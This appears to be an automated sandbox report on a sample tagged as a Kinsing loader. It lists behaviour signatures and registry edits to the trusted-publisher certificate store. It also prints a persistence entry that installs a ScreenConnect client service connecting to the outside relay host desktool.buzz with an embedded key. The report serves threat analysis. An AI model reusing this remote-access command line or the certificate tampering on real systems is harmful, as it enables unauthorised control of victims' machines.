Malware Analysis Report

2024-10-23 21:16

Sample ID 240125-vxdlfacdfl
Target https://google.com
Tags
kinsing loader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://google.com was found to be: Known bad.

Malicious Activity Summary

kinsing loader persistence

Kinsing

Downloads MZ/PE file

Sets service image path in registry

Manipulates Digital Signatures

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-25 17:21

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-25 17:21

Reported

2024-01-25 17:41

Platform

win10v2004-20231215-en

Max time kernel

516s

Max time network

517s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffac9ef9758,0x7ffac9ef9768,0x7ffac9ef9778

Signatures

Kinsing

loader kinsing

Downloads MZ/PE file

Manipulates Digital Signatures

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579 C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e C:\Users\Admin\Downloads\support.Client.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054 C:\Users\Admin\Downloads\support.Client.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C C:\Users\Admin\Downloads\support.Client.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (50ef8fa4-9a64-466f-978c-e78b5206d7cb)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\76DXXRDA.GZ2\\R9ERHRLR.ZPO\\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\\ScreenConnect.ClientService.exe\" \"?y=Guest&h=desktool.buzz&p=8041&s=50ef8fa4-9a64-466f-978c-e78b5206d7cb&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAW6Fa6eKoxEOVkfIEPqjcEAAAAAACAAAAAAAQZgAAAAEAACAAAADBvLzFh%2bNm%2byK1vN90thNA2jW14sFgU8y0B6MausHTAQAAAAAOgAAAAAIAACAAAABd1IL4IVPQiOfxrDb08htqJDE6BEgduH0jbt1XV6am1qAEAADlwe04F8UBIvRpATJgqNrAR3mwSiH4yOpWNV3cefXxCu637MtUAF%2fV1Rj%2bYAU1DzBhmzX7HFqw2LH9Pd7E6rdP9%2bxW9TgmkEZm4wwg6jmQNPByYKweglHH2mclJOO%2f0oyYjnRHf%2boQOnTnA9Es40l95PmRYSkCaRSt8bJCFVW8tQ3PM9v5yV6UCqYbfmXkxfd9ugsBGLv58c4LeOWxfrsS913KbVcz736jDiED11gE2UMuLBQqrtQE%2fk50SQAdxgekQWywTo0Ef%2buL3yo2A6XxhGjaGkc81hI9GekzuTHTimuArJhTHR46f1XIrkaYwQVLgWhb3oCk7dc52RPIKQl2TZ5ybUoflNX3KAMXW43z%2b2PjFuaJgTjS48KnwihZjiZeRuQrbGvjVhTR8LIz13eR1rTzwuz2z%2bHmqMe5tOsKk%2fzDr%2bNq65hxmW%2bTbye6oTQQ8cZOVxB2LtxJUwIpfG3yijKBUNN%2fAlD4WmjUNuCL%2fSa6QkpduuEcKNSjmb%2bJfnUS2Cik%2ftOi8OHQKD03gF%2fpOvAEhNrxPsA5NaiGmuwbFJtk3u7npr%2b6BRMiUYB2nrYWrC4xaCJp30z%2f9byK7xiSCtxJryL1c8v2Wb3YWQNVRT24WjIwsGpxK0meIBv0jjZ%2fbg1NikJ9PT4CJUE3gWqZ79nYthUw2fFkl78rX35cnwz7Mc3PwsHEAq5rt6oUmwwHbz9mUQ0N8VDKIFVDSh12Mzt2Fzc%2fHv3uXLJOz2zQLVJITwDsqBIblcWGb5ZMS86wpww4Otc86FQRzMsnX1XuqkP%2bBJ%2fsE4HaVUO4qsaBRYBi27n5piamWbj3u5qckfyzRImCBNkDbN39bsYoup02cxWkjJeJ%2b253AJGcik4AJGMCmfWFDXx6f%2by52YJi0wDGBH38RdT4XZmDTOD%2b%2fpvHGREkE83D6ACXEALhuXrUYVOAmNSsZbyu94CnRw6FhEorNRsi0H6o7M%2b7BXYM4qVUsZi1YfYWbbrnRIjmC6ZXr0%2f%2fEqSugWLpYoBFwFcgsY80wcOCyWVjAvZ%2fSLOmqY%2fzeOsihrxxsFIfXofVJogOOUVRKo1lQHivst2ShkI3XF%2fX9boPNO%2bsB9dJe4zcsKdZMZWoB0AJGprf1TY4xyZ3J2xRZf%2ftp8u5VnhwQFXbtJ%2ftIjmWL7E0JNeG3mV%2fmhHi4NqkeaoifZy2xfw9upInX%2bXm5snrvIQGdhrMAXsLu7KtXqaK53SWMbEXRISwyLp3vyv5XNVy73xDn6kXL5sOpCtB7HgMoeWPbKs6KTtpgs%2fy9Bl7wQ6JeeXc0ZIoOaaxTsxidv7PF4Yko8PbMJp3TjdHaoigDZsc3OYxPaTnR0BT2dV2jsof1eHIe0fKqLh6SLopXzDr7PHxRIaj9WxjO%2fQmrEZsfByS5bnw2Q21CPqGWI4i7WkRGd88HJoGAEbWaux35HzC7U7vFronvWVSAjjhyY1tzEdbmwlcq8xOgUZhYmYiHLXLw%2fH37ZpA0%2fsO5mq1qvAuvMTLh4vMSHOxFvNnjgsCGaTOM8ZbQ%2fgJaMtmIKX2z1WzeYudqRIxIO5B3dpioQa%2frHSG4B9LNg2WZEAAAADHLwmv4dVT7d5WGReMbMvSiGP2OThXgOTF%2fxTnxISh4MW8RqAiLumK1kwjwyK1Ds2UAjRvqoENUa5YLj%2fmRLfY&r=&i=Sam%20Dan\" \"1\"" C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Apps\2.0\76DXXRDA.GZ2\R9ERHRLR.ZPO\scre..tion_25b0fbb6ef7eb094_0017.0002_fa0b02d0f3da3092\ScreenConnect.ClientService.exe N/A
